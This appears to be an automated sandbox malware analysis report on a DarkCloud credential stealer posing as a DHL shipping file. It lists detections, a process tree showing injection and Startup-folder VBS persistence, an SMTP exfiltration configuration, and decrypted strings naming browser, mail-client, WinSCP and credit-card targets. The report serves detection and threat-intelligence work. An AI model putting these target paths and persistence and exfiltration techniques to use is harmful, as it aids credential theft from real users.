Edit tour

Windows Analysis Report
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Overview

General Information

Sample name:	DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe
Analysis ID:	1552675
MD5:	efc42aebb5315984c43b7267f47217f0
SHA1:	97dd02a97babc3e23b0b627c8a7f6b2570ae168f
SHA256:	e5f020c3e75605569ade89e83e50675f2f676695f263f6d8a28ad5e7b6ea2f19
Tags:	DarkCloudDHLexeuser-abuse_ch
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Yara detected AntiVM3

Yara detected DarkCloud

Yara detected Generic Dropper

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe (PID: 6152 cmdline: "C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe" MD5: EFC42AEBB5315984C43B7267F47217F0)

InstallUtil.exe (PID: 5804 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 2680 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Size.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Roaming\Size.exe" MD5: EFC42AEBB5315984C43B7267F47217F0)

InstallUtil.exe (PID: 5340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "SMTP", "To Address": "facturacion@fitosansa.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3ecdc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000007.00000002.3287434454.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3c44:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x3f0bc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000000.00000002.2116282473.0000000006660000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2097900919.000000000288C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000002.2293133444.000000000331C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe PID: 6152	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Size.exe PID: 6472	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Process Memory Space: Size.exe PID: 6472	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Size.exe PID: 6472	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Size.exe PID: 6472	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 5340	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.6660000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
6.2.Size.exe.4379f48.7.raw.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
6.2.Size.exe.4379f48.7.unpack	JoeSecurity_DarkCloud	Yara detected DarkCloud	Joe Security
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3c44de8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3b2dfc8.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.39fba20.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe", CommandLine: "C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe", CommandLine|base64offset|contains: =z_, Image: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, NewProcessName: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, OriginalFileName: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe", ProcessId: 6152, ProcessName: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , ProcessId: 2680, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs" , ProcessId: 2680, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, ProcessId: 6152, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T09:20:40.580890+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.5	49706	TCP
2024-11-09T09:21:02.724433+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.5	59352	TCP
2024-11-09T09:21:04.029537+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.5	59358	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T09:20:34.319246+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	162.55.60.2	80	TCP
2024-11-09T09:20:56.346798+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	56543	162.55.60.2	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Size.exe

Avira: detection malicious, Label: HEUR/AGEN.1309900

Found malware configuration

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "SMTP", "To Address": "facturacion@fitosansa.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Size.exe

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	ReversingLabs: Detection: 57%
Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Virustotal: Detection: 33%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Size.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Cookies
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: \Default\Login Data
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: \Login Data
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Password :
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: SMTP Email Address
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: NNTP Email Address
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Email
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: HTTPMail User Name
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: HTTPMail Server
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Password
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Visa Card
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Visa Master Card
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: \logins.json
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: \signons.sqlite
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Foxmail.exe
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: EnableSignature
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Application : FoxMail
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: logins
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: purchase01.qualitydevlopments@gmail.com
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusing
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpauthenticate
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserver
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserverport
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpusessl
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusername
Source: 0.2.DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe.3901b68.2.raw.unpack	String decryptor: Select * from Win32_ComputerSystem

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2117069451.0000000006940000.00000004.08000000.00040000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003644000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3287428643.0000000000459000.00000040.00000400.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000443C000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2310176986.000000000433F000.00000004.00000800.00020000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003739000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2097900919.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2117069451.0000000006940000.00000004.08000000.00040000.00000000.sdmp, Size.exe, 00000006.00000002.2293133444.0000000003644000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.0000000003F68000.00000004.00000800.00020000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2116558407.00000000066F0000.00000004.08000000.00040000.00000000.sdmp, DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe, 00000000.00000002.2110603697.00000000039C4000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then jmp 065CC87Ch	0_2_065CC670
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then jmp 065CC87Ch	0_2_065CC660
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then jmp 0677C023h	0_2_0677BDA0
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then jmp 0677C023h	0_2_0677BD9F
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then jmp 0677C023h	0_2_0677C0E4
Source: C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_069E1512
